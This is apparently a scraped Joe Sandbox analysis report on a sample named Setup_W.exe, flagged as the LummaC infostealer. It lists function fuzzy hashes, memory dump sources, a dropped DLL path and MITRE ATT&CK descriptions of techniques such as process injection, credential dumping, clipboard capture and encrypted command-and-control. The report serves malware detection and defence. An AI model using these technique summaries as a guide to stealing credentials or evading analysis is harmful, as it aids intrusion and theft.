Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
Instruction ID: b6f1c58577b93784980e3ecbb57c81fa0641531103505bd7ed912e0c9460b5dc
Opcode Fuzzy Hash: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
Instruction Fuzzy Hash: 21E01274A096049BEB00BF7DD4C485BBFE4EF58254F01486AED848F305DB35D8519BE6

Analysis Process: BitLockerToGo.exePID: 7680, Parent PID: 7304COMMON

Non-executed Functions

Function 032E1652 Relevance: 1.6, Instructions: 1606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.2145432878.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 032E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_32e1000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dac68c586158efe3c9f0e657d95d1566c4212d24e3eba8b7a692698d4b049b
Instruction ID: b1bf7a3c097c86cfcce7816a8bc55a2979cc9ac659d0146dd54ef36882d63be2
Opcode Fuzzy Hash: e2dac68c586158efe3c9f0e657d95d1566c4212d24e3eba8b7a692698d4b049b
Instruction Fuzzy Hash: 03622AA240E3C18FD313CB748CA66917FB1AF27204B5E09DBC4C4CF2A3E2696569D756

Function 0328E752 Relevance: .8, Instructions: 771COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4b533407f74c5d214f1334b191176c6a3663c1e33650d6675be27f8b12c6ed
Instruction ID: c7b872dd0feaf9d0c8ff0ff8965226549de8d4e8229277a1ec3e956b4c88e299
Opcode Fuzzy Hash: 2d4b533407f74c5d214f1334b191176c6a3663c1e33650d6675be27f8b12c6ed
Instruction Fuzzy Hash: 82523335009BA5AFDF23DB32C89C7503BE1EF1725430D46EAD4888F4AAE66495C6CB47

Function 032E217A Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.2145432878.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 032E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_32e1000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32362e948257e3c6d22cac1a2fee27b50ff79fd5e4600345c4ceb6a3e1260879
Instruction ID: 077ac683a119e458dd864a6a74f5fcd9c95de62292461e2cf6e8b0dc537ba789
Opcode Fuzzy Hash: 32362e948257e3c6d22cac1a2fee27b50ff79fd5e4600345c4ceb6a3e1260879
Instruction Fuzzy Hash: DC81066240E7C19FD3138B748CA66917FB1AF13200B1E49DBC4C4CF2A3E26C6669DB56

Function 0329686F Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a583d80d2522399f431ca6c863b5649c27c56793678206392903918c906bb9
Instruction ID: 2d25b6446a9c354cfbdb6d64472fee5d4110dc6596ecac84cb2202b3de912885
Opcode Fuzzy Hash: 13a583d80d2522399f431ca6c863b5649c27c56793678206392903918c906bb9
Instruction Fuzzy Hash: 2C61121545E7C24FEB178B7449A9492FFA4BD5312431EC7DFC8D98E8A3C30A918AD362

Function 03296A29 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
Instruction ID: f7ce1a626ddd8b876ff0a4c6d7d88c6e5d179238e4cd02217f61bd67420e369c
Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
Instruction Fuzzy Hash: A62134611092D18FD703CF34D4A4A82BFA2FF8B32639E80DDC8C18F427C2A66542CB42

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup_W.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
Setup_W.exe

Function 64608848 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 378
windowregistrylibraryCOMMON

Function 6460496F Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 330
stringCOMMON

Function 6460C519 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 297
windowCOMMON

Function 6460998C Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 94
COMMON

Function 6460309B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMON

Function 6460BC57 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Function 6460EC78 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147
COMMON

Function 6460EBE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Function 64609B0E Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 646021F7 Relevance: 66.7, APIs: 18, Strings: 20, Instructions: 234
libraryloaderstringCOMMON

Function 64601B16 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 231
stringCOMMON

Function 646025A0 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 395
librarystringCOMMON

Function 64609F84 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181
COMMON

Function 6460737C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 208
libraryloaderCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre